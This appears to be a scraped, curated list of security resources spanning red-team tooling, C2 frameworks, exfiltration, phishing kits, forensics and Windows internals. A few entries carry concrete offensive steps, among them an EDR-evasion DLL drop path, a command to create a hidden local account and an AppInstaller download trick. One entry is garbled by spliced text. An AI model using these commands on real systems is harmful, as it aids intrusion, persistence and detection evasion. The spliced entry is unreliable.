- So You Want to Run a Red Team Operation: I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization.
- Alternative C2 for Red Teamers: Koadic Command & Control Framework. Koadic C3 COM Command & Control - JScript RAT
- tunning tip: if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp<rand>\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder)
- In-Memory-Only ELF Execution (Without tmpfs): In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).
- A Red Teamer's guide to pivoting
- caldera: Automated Adversary Emulation.
- BankSecurity - Red_Team: Some scripts useful for red team activities
- FIN6 Adversary Emulation
- Red-Teaming-Toolkit: A collection of open source and commercial tools that aid in red team operations.
- RedFile: A flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads
- Choose Your Own Red Team Adventure
- Red Tip #415: STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use “smbpasswd -r domain.fqdn -U username” to change the password so you can use the account.
- Red Team Tactics: Hiding Windows Services
- AQUARMOURY: This is a tool suite consisting of miscellaneous offensive tooling aimed at red teamers/penetration testers to primarily aid in Defense Evasion TA0005
- Prelude Operator: is the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming. repo
- 0xsp Mongoose Red for Windows: a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network.
- Macrome: Excel Macro Document Reader/Writer for Red Teamers & Analysts
- Cobalt Strike: is software for Adversary Simulations and Red Team Operations. 4.2 release notes
- CrossC2: generate CobaltStrike's cross-platform payload
- Cobalt-Strike-CheatSheet: Some notes and examples for cobalt strike's functionality
- Octopus: Open source pre-operation C2 server based on python and powershell
- Covenant: Covenant is a collaborative .NET C2 framework for red teamers.
- Purple Cloud: An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On kiploit
- dnstwist
- Plight At The End Of The Tunnel
- dref: DNS Rebinding Exploitation Framework
- dns-rebind-toolkit: A front-end JavaScript toolkit for creating DNS rebinding attacks.
- Bypass firewalls by abusing DNS history: Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.
- dnstwist: Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
- Can I take over XYZ?: a list of services and how to claim (sub)domains with dangling DNS records.
- SubR3con: is a script written in python. It uses Sublist3r to enumerate all subdomains of specific target and then it checks for stauts code for possible subdomain takeover vulnerability. This works great with Subover.go
- TakeOver-v1: script extracts CNAME record of all subdomains at once. TakeOver saves researcher time and increase the chance of finding subdomain takeover vulnerability.
- subzy: Subdomain takeover vulnerability checker.
- Subdomain Takeover Scanner
- subdomain-takeover: SubDomain TakeOver Scanner by 0x94.
- DNSCrypt is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with. dnscrypt-proxy 2, resolvers and docker image.
- pdns-qof: Passive DNS Common Output Format.
- dnsdbq: DNSDB API Client, C Version.
- DNS Logging:
- DNSObserver: A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends lookup notifications via Slack. Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor
- Unbound DNS Blacklist
- subjack: Subdomain Takeover tool written in Go
- sad dns: The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq).
- dog: Command-line DNS client
- Script for searching the extracted firmware file system for goodies!
- DKMC - Dont kill my cat: Malicious payload evasion tool
- Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
- gitleaks: Searches full repo history for secrets and keys
- Twitter Scraper
- BloodHound: Six Degrees of Domain Admin, and a Python based ingestor for BloodHound
- tinfoleak (github):The most complete open-source tool for Twitter intelligence analysis
- Social IDs: Get user ids from social network handlers
- SpookFlare: Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures.
- Photon: Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
- Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
- accountanalysis: This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often.
- How to get authentication key from SNMPv3 packets
- AtomicTestsCommandLines.txt: Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
- whois | GTFOBins: hangs waiting for the remote peer to close the socket. github
- Browsers affected by the History API DoS
- PacketWhisper: Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography
- Using Google Analytics for data extraction
- Exfiltrating credentials via PAM backdoors & DNS requests
- Building simple DNS endpoints for exfiltration or C&C
- CheckPlease: Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust.
- okhttp-peer-certificate-extractor: This tool extracts peer certificates from given certificates.
- DET: (extensible) Data Exfiltration Toolkit (DET)
- awesome-python-login-model: login access for webscrapping.
- Hamburglar: collect useful information from urls, directories, and files.
- Giggity: grab hierarchical data about a github organization, user, or repo.
- Living Off The Land Binaries and Scripts (and also Libraries) - github
- Windows TCPIP Finger Command: C2 Channel and Bypassing Security Software
- Living Off Windows Land – A New Native File “downldr”
- Ttdinject.exe:Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
- Exfiltrate Like a Pro: Using DNS over HTTPS as a C2 Channel
- Awesome Asset Discovery: List of Awesome Asset Discovery Resources
- Cloakify-Factory:: A Data Exfiltration Tool Uses Text-Based Steganography.
- hakrawler: Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application. A Fast Web Crawler for Hackers
- Chameleon: A tool for evading Proxy categorisation.
- DNSExfiltrator: Data exfiltration over DNS request covert channel
- Data Exfiltration using Linux Binaries
- Exploring the WDAC Microsoft Recommended Block Rules: kill.exe. lolbin/lolbas
- I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source= lolbin/lolbas
- Payloads Collection by @alra3ees:
- Command Injection Payload List
- Cross Site Scripting ( XSS ) Vulnerability Payload List
- XML External Entity (XXE) Injection Payload List: XML External Entity (XXE) Injection Payload List
- SQL Injection Payload List: SQL Injection Payload List
- RFI/LFI Payload List.
- Open Redirect Payload List
- Payload Delivery for DevOps: Building a Cross-Platform Dropper Using the Genesis Framework, Metasploit and Docker. code
- (pt-br) Criando Payloads de Shell Reverso com MSFVenom
- LaTex Injection
- Phishing on Twitter
- evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
- shellphish: Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
- pompa: Fully-featured spear-phishing toolkit - web front-end.
- ..Modlishka..: Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side).
- Using phishing tools against the phishers — and uncovering a massive Binance phishing campaign.
- Lure: User Recon Automation for GoPhish
- PhishingKitTracker: An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats.
- Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
- O-Saft: OWASP SSL advanced forensic tool
- PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
- swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics
- The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
- Invoke-LiveResponse
- Linux Forensics
- CDQR: The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
- mac_apt: macOS Artifact Parsing Tool
- MacForensics: Repository of scripts for processing various artifacts from macOS (formerly OSX).
- imago-forensics: Imago is a python tool that extract digital evidences from images.
- remedi-infrastructure: setup and deployment code for setting up a REMEDI machine translation cluster
- Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
- libelfmaster: Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
- usbrip (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
- Digital Forensics and Incident Response: This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response.
- KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. blog post. KAPE docs and KAPE Files
- AVML(Acquire Volatile Memory for Linux).
- turbinia: Automation and Scaling of Digital Forensics Tools
- Eric Zimmerman's Tools
- MacQuisition: A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
- Kuiper: Digital Forensics Investigation Platform
- file Signatures:
- PowerForensics: PowerForensics provides an all in one platform for live disk forensic analysis. Powershell
- OfficeForensicTools: A set of tools for collecting forensic information.
- CAINE: Computer Aided INvestigative Environment. Is an Italian GNU/Linux live distribution created as a Digital Forensics project.
- e-Fense Helix 3
- black arch
- List of Live Distributions for Computer Forensics
- volatility: An advanced memory forensics framework
- Volatility profiles for Linux and Mac OS X
- Building a profile for Volatility
- AutoVolatility: Run several volatility plugins at the same time.
- Memory Forensics and Analysis Using Volatility
- Volatility, my own cheatsheet (Part 1): Image Identification
- First steps to volatile memory analysis
- MITRE ATT&CK:
- (pt-br)Analisando ameaças com Mitre ATT&CK Navigator
- ATT&CK™ Navigator: Web app that provides basic navigation and annotation of ATT&CK matrices github.
- Atomic Threat Coverage: Actionable analytics designed to combat threats based on MITRE's ATT&CK.
- atomic-red-team: Small and highly portable detection tests based on MITRE's ATT&CK.
- Welcome to Stealthbits Attack Catalog: Adversary techniques for credential theft and data compromise.
- DeTTECT: Detect Tactics, Techniques & Combat Threats
- Awesome Honeypots: A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects.
- Blue Team Fundamentals
- Blue Team fundamentals Part Two: Windows Processes.
- Sooty: The SOC Analysts all-in-one CLI tool to automate and speed up workflow.
- Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
- Your detections aren't working
- elastalert: Easy & Flexible Alerting With ElasticSearch
- Technical Approaches to Uncovering and Remediating Malicious Activity: Alert (AA20-245A).
- EVTX-ATTACK-SAMPLES: Windows Events Attack Samples slides
- Sysmon 12.0 — EventID 24: Sysmon 12 is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring.
- Windows Advanced Audit Policy Map to Event IDs
- takuan is a system service that parses logs and dectects noisy attackers in order to build a blacklist database of known cyber offenders.,
- CobaltStrikeScan: Scan files or process memory for CobaltStrike beacons and parse their configuration.
- Cobalt Strike Beacon Analysis. python decoder: 1768k
- How to Design Detection Logic - Part 1
- MitigatingPass-the-Hashand OtherCredential Theft
- Evilginx-ing into the cloud: How we detected a red team attack in AWS
- Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
- Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Adwind Dodges AV via DDE
- strelka: Scanning files at scale with Python and ZeroMQ
- Threat-Hunting: Personal compilation of APT malware from whitepaper releases, documents and own research
- ThreatHunter-Playbook: A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.
- HELK - The Hunting ELK: The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
- mordor: Re-play Adversarial Techniques.
- ioc_writer: Provide a python library that allows for basic creation and editing of OpenIOC objects.
- 3 of the main observed false positive ive learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces). For #redteam u can blend in with mimicking case1 by naming ur module something like MSI*.tmp and using similar export fct name (dll path usually under c:\users* so no high priv needed).
- thethe: Simple, shareable, team-focused and expandable threat hunting environment. The Threat Hunting Environment
- Mordor PCAPs 📡:
- cyber-threat-response-clinic
- opencti: Open Cyber Threat Intelligence Platform
- securityonion: Security Onion 2.0 (Pre-release) - Linux distro for threat hunting, enterprise security monitoring, and log management
- TheHive: a Scalable, Open Source and Free Security Incident Response Platform
- TheHive4py: Python API Client for TheHive
- TheHiveIRPlaybook is a collection of TheHive case templates used for Incident Response
- Cortex-Analyzers : Cortex Analyzers Repository
- Nimbus Network Traffic Analyzer Augmented with our world-class threat intelligence.
- ja3 is a standard for creating SSL client fingerprints in an easy to produce and shareable way.
- Threat Hunting Process
- Threat Hunting Princiĺes
- Some repos from hunters-forge: API-To-Event, notebooks-forge, BloodHound Notebooks
- Yeti: Your Everyday Threat Intelligence
- Watcher: Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS.
- Network Analysys:
- traffic-analysis-workshop and wireshark-tutorial-decrypting-HTTPS-traffic
- Wireshark Tutorial: Exporting Objects from a Pcap
- Hex Packet Decoder: Hex Packet Decoder provides an HTTP API for you to parse network packets.
- Packetor: Packetor is an online hex-dump packet analyzer / decoder.
- Lookup Before You Go-Go...Hunting.
- Insider Threat Hunting and It's all in the numbers.
- Wazuh: is a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. repo and ansible
- Hunting the Hunters - RCE in Covenant C2. PoC Video
- Passive SSH: Passive SSH is an open source framework composed of a scanner and server to store and lookup the SSH keys and fingerprints per host (IPv4/IPv6/onion). repo: passive-ssh
- MISP (core software) - Open Source Threat Intelligence Platform (formely known as Malware Information Sharing Platform)
- MISP galaxy: Clusters and elements to attach to MISP events or attributes (like threat actors)
- DigitalSide Threat-Intel: Threat-Intel repository. API
- MISP-sizer: Sizing your MISP instance.
- MISP CERT.br
- misp-warninglist: Warning lists to inform users of MISP about potential false-positives or other information in indicators
- MISP-maltego: Set of Maltego transforms to inferface with a MISP Threat Sharing instance, and also to explore the whole MITRE ATT&CK dataset.
- misp-modules: Modules for expansion services, import and export in MISP
- misp-taxonomies: Taxonomies used in MISP taxonomy system and can be used by other information sharing tool.
- PyMISP: Python library using the MISP Rest API
- APT33: More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting. Iranian hacking group built its own VPN network. APT33, the Iranian hacking group behind Shamoon, built its own VPN network.
- Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack
- Adversary Reports: The latest whitepapers, solution briefs, and datasheets from Dragos
- APT29 targets COVID-19 vaccine development
- What is APT28's Drovorub Malware?. FBI and NSA report
- Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS' Malware at Scale
- Tracking A Malware Campaign Through VT
- More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
- APT41: US Charges Five Alleged Members of APT41 Group
- Analysis Report (AR20-268A)
- CYPRESS - Cyber Planning for Response and Recovery Study 2020 FERC, NERC and REs Report.
- CHIMBORAZO TA505
- Threat Group Cards: A Threat Actor Encyclopedia.
- sophos labs IoCs: Sophos-originated indicators-of-compromise from published reports
- DailyIOC: IOC from articles, tweets for archives
- CVE-2020-1472 Zerologon IoCs
- iocs: Indicators from Unit 42 Public Reports
- Threat intelligence and threat detections: Threat intelligence and threat detection indicators (IOC, IOA).
- APT_Digital_Weapon: Indicators of compromise (IOCs) collected from public resources and categorized by Qi-AnXin.
- Ryuk Speed Run, 2 Hours to Ransom
- What did DeathStalker hide between two ferns?
- Sigma: Generic Signature Format for SIEM Systems
- Events Heatmap
- RedELK: Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
- plaso: Super timeline all the things.
- Heatmaps Make Ops Better
- graylog-guide-snort: How to send structured Snort IDS alert logs into Graylog
- TALR: Threat Alert Logic Repository
- Auditing Continuously vs. Monitoring Continuously
- Logsspot: Logsspot is a project created to help cybersec folks understand what kind of information a security technology can present and how to use to improve detection and intelligence.
- Corsair: Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC).
- Scalable Logging and Tracking
- Logs were our lifeblood. Now they're our liability.
- Using Flume to Collect Apache 2 Web Server Logs
- spectx: Instantly parse and investigate raw log files
- The log/event processing pipeline you can't have
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Here's a Splunk way to score behaviors that are derived from detections.
- Bypassing Browser Security Warnings with Pseudo Password Fields
- The 9 Lives of Bleichenbacher's CAT: New Cache ATtacks on TLS Implementations
- How To Blow Your Online Cover With URL Previews
- Nefarious LinkedIn: A look at how LinkedIn exfiltrates extension data from your browser.
- Lightnion: A light version of Tor portable to the browser.
- Puppeteer: Headless Chrome Node API. site
- uBlock Origin: An efficient blocker for Chromium and Firefox. Fast and lean.
- autochrome: This tool downloads, installs, and configures a shiny new copy of Chromium.
- BROWSERGAP:Browse Anything Securely, Browse the web without the web browsing you.
- browsergap.ce: Simple Isolated Remote Browsers, Open Source
- Crash Chrome.
- Firefox: How a website could steal all your cookies
- Addons for Firefox:
- LinkGopher
- (Image) WebDeveloper
- (Image) IPvFoo
- DownthemAll
- SixorNot
- Uppity
- Cliget
- (Image) URLs List
- Link Redirect Trace
- Tamper Data for FF Quantum
- BuiltWith
- Wappalyzer
- Exif Viewer
- Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
- bochspwn-reloaded: A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
- drltrace: Drltrace is a library calls tracer for Windows and Linux applications.
- shellz: is a small utility to track and control your ssh, telnet, web and custom shells.
- CLIP OS: Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information
- How to Get Started With VMware vSphere Security « vMiss.net
- routeros: RouterOS Bug Hunt Materials Presented at Derbycon 2018
- Awesome-Study-Resources-for-Kernel-Hacking: Kernel Hacking study materials collection
- Skadi: Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux.
- taintgrind:A taint-tracking plugin for the Valgrind memory checking tool. gcc + LD_PRELOAD + taintgrind + graphviz
- UPX is a free, portable, extendable, high-performance executable packer for several executable formats. repo
- Mainframe:
- MF Sniffer: Mainframe TN3270 unencrypted TSO session user ID and password sniffer.
- uefi-jitfuck: A JIT compiler for Brainfuck running on x86_64 UEFI
- Secure Boot in the Era of the T2: Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot.
- PSPTool: Display, extract, and manipulate PSP firmware inside UEFI images
- Project Mu: is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern. github repo
- Force firmware code to be measured and attested by Secure Launch on Windows 10
- Awesome Advanced Windows Exploitation References
- windows kernel security development
- A process scanner detecting and dumping hollowed PE modules.
- dll_to_exe: Converts a DLL into EXE
- pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
- A PowerShell utility to dynamically uncover a DCShadow attack
- Security Research from the Microsoft Security Response Center (MSRC)
- DCSYNCMonitor
- Total Meltdown?
- DetectionLab: Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post here
- powerlessshell: Run PowerShell command without invoking powershell.exe.
- internal-monologue: Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
- Robber is open source tool for finding executables prone to DLL hijacking
- Remote-Desktop-Caching
- LogRM: LogRM is a post exploitation powershell script which it uses windows event logs to gather information abou
- InvisiblePersistence: Persisting in the Windows registry "invisibly"
- Dynamic Tracing in Windows 10 19H1
- Capturing NetNTLM Hashes with Office [DOT] XML Documents
- LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
- Passing-the-Hash to NTLM Authenticated Web Applications
- Detours: Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form.
- r0ak: r0ak ("roak") is the Ring 0 Army Knife -- A Command Line Utility To Read/Write/Execute Ring Zero on for Windows 10 Systems.
- SpeculationControl: SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown).
- Reverse Engineering Windows Defender (by Alexei Bulazel): pdf and videos
- Ground Zero: Part 2-2 XOR encryption – Windows x64
- Ground Zero: Part 2-3 Building Cracked Binaries – Windows x64
- EKFiddle: A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.
- Windows Command-Line: Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers
- MSconsole: Windows Console Tools
- PowerShell Remoting by Stephanos Constantinou Blog
- BloodHound Database Creator: This python script will generate a randomized data set for testing BloodHound features and analysis.
- Windows Privilege Escalation (Unquoted Path Service)
- DbgShell: A PowerShell front-end for the Windows debugger engine.
- Windows Incident Response: Updates
- Win 10 related research
- UAC bypass using CreateNewLink COM interface
- Remote NTLM relaying through meterpreter on Windows port 445, DivertTCPconn: A TCP packet diverter for Windows platform.
- Analyzing obfuscated powershell with shellcode, Empire is a PowerShell and Python post-exploitation agent.. OVERVIEW OF EMPIRE 3.4 FEATURES
- Suspicious Use of Procdump: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.
- relayer: SMB Relay Attack Script
- Ps1jacker: Ps1jacker is a tool for generating COM Hijacking payload.
- python-dotnet-binaryformat: Pure Python parser for data encoded by .NET's BinaryFormatter
- WinPwnage: Elevate, UAC bypass, privilege escalation, dll hijack techniques
- Invoke-PSImage: Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
- Firework: Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process.
- hUACME: Defeating Windows User Account Control
- SysmonTools: Utilities for Sysmon
- sysmon-config: Sysmon configuration file template with default high-quality event tracing.
- Sysmon: how to set up, update and use?
- Panache_Sysmon: Just another sysmon config
- Hiding malware in Windows – The basics of code injection
- Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. announcement
- Bypassing AppLocker Custom Rules: 0x09AL Security blog
- SpecuCheck: SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre)
- RID-Hijacking: Windows RID Hijacking persistence technique
- WSL Reloaded
- Windows oneliners to download remote payload and execute arbitrary code
- reflectivepotato: MSFRottenPotato built as a Reflective DLL. Work in progress.
- randomrepo: Repo for random stuff
- Microsoft Windows win32k.sys: Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research
- rdpy: Remote Desktop Protocol in Twisted Python
- SharpWeb: NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge.
- reconerator: C# Targeted Attack Reconnissance Tools
- ManbagedInjection: A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
- InveighZero: C# LLMNR/NBNS spoofer
- DanderSpritz Lab: A fully functional DanderSpritz lab in 2 commands.
- Lateral movement using URL Protocol gist
- HiddenPowerShell: This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker.
- One Windows Kernel.
- The Dog Whisperer’s Handbook: This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module.
- Attack and Defend microsoft enhanced security administrative environment
- raw-socket-snifferr: Packet capture on Windows without a kernel drive
- DCOMrade: Powershell script for enumerating vulnerable DCOM Applications
- shed: .NET runtime inspector
- Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
- How to steal NTLMv2 hashes using file download vulnerability in web application
- Securing SCOM in a Privilege Tiered Access Model–Part 1
- Simpleator: ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever
- WinDbg-Samples: Sample extensions, scripts, and API uses for WinDbg.
- Windows Privilege Escalation Guide: This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect.
- OrgKit: Provision a brand-new company with proper defaults in Windows, Offic365, and Azure
- Leveraging WSUS.
- windowsblindread: A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
- azucar: Security auditing tool for Azure environments
- volatility-wnf: Browse and dump Windows Notification Facilities.
- NetNTLMtoSilverTicket: SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket.
- Domain Goodness – How I Learned to LOVE AD Explorer
- Yet another sdclt UAC bypass: As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window.
- awesome-windows-kernel-security-development: windows kernel security development.
- An introduction to privileged file operation abuse on Windows: This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
- ALPC-BypassUAC: UAC Bypass with mmc via alpc.
- ManagedPasswordFilter: Windows Password Filter that uses managed code internally
- DeviceGuardBypasses: A repository of some of my Windows 10 Device Guard Bypasses
- rifiuti2: Windows Recycle Bin analyser
- Control Flow Guard Teleportation: The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking if the target address for an indirect call is valid function. [demo](https:/The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.nprivileged window could just send commands to a highly privileged window, and that’s what UIPI, User Interface Privilege Isolation, prevents. This isn’t a story about UIPI, but it is how it began. ctftool - Interactive CTF Exploration Tool
- Reversing and Patching .NET Binaries with Embedded References
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Windows PowerShell Remoting: Host Based Investigation and Containment Techniques.
- .NET Manifesto: win friends and influence the loader. malwariaLabs. slides from derbycon 2019
- Bypassing Windows User Account Control
- symboliclink-testing-tools: This is a small suite of tools to test various symbolic link types of Windows.
- Run PowerShell without Powershell.exe — Best tools & techniques
- Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor
- Privileged Access Workstations
- Activation Contexts — A Love Story. Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise.
- Evil-WinRM: The ultimate WinRM shell for hacking/pentesting
- Understanding WdBoot (Windows Defender ELAM)
- SharpHide: Tool to create hidden registry keys.
- Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account
- Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths
- CrackMapExec module to set as "owned" on BloodHound every target owned by the attacker
- Configuring Additional LSA Protection
- Getting Malicious Office Documents to Fire with Protected View Enable
- The Internals of AppLocker:
- Part 1: Overview and Setup
- Part 2: Blocking Process Creation
- Part 3: Access Tokens and Access Checking
- Part 4: Blocking DLL Loading
- COM-Code-Helper: Two IDAPython Scripts help you to reconstruct Microsoft COM (Component Object Model) Code.
- Scylla: Imports Reconstructor
- A Speed-Research on Windows Explorer's Auto-Completion
- sysmon-config: A Sysmon configuration file for everybody to fork
- Windows Event Forwarding Guidance
- Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI
- Microsoft Defender Advanced Threat Protection (ATP)
- BeaKer - Beaconing Kibana Executable Report: Aggregates Sysmon Network Events With Elasticsearch and Kibana
- python-ntlm: Automatically exported from code.google.com/p/python-ntlm
- Logging Made Easy: is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks.
- lme: Logging Made Easy, is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks.
- SharePoint and Pwn :: Remote Code Execution Against SharePoint Server Abusing DataSet
- Secure DevOps Kit for Azure (AzSK)
- Windows Debugger API — The End of Versioned Structures
- DisableAntiSpyware
- Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?
- DefendTheFlag: Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products.
- DumpReparsePoints: This is a simple tool to dump all the reparse points on an NTFS volume.
- Certify SSL Manager: manage free https certificates for IIS
- Bypassing Credential Guard: Wdigest can be enabled on a system with Credential Guard by patching the values of g_fParameter_useLogonCredential and g_IsCredGuardEnabled in memory.
- WSUS Attacks Part 1: Introducing PyWSUS
- This is about adding a $ account and have it not show up in net users.: net user $ LetMeIn123! /add /active:yes
- LECmd: Lnk Explorer Command line edition!!
- PECmd: Prefetch Explorer Command Line.
- Five PE Analysis Tools Worth Looking At
- pestudio: The goal of pestudio is to spot suspicious artifacts within executable files in order to ease and accelerate Malware Initial Assessment and is used by Computer Emergency Response Teams and Labs worldwide.
- PEview version
- FileAlyzer
- NTCore Explorer Suite
- exeinfo github
- MitigationFlagsCliTool: Prints mitigation policy information for processes in a dump file.
- Windows 10 System Programming book samples Windows Internals Book 7th Edition Tools, The Windows Kernel Programming book samples
- DriverMon: Monitor activity of any driver
- Windows AllTools: All reasonably stable tools
- Sysmon Internals: From File Delete Event to Kernel Code Execution
- Windows-driver-samples: This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples.
- procfilter: A YARA-integrated process denial framework for Windows
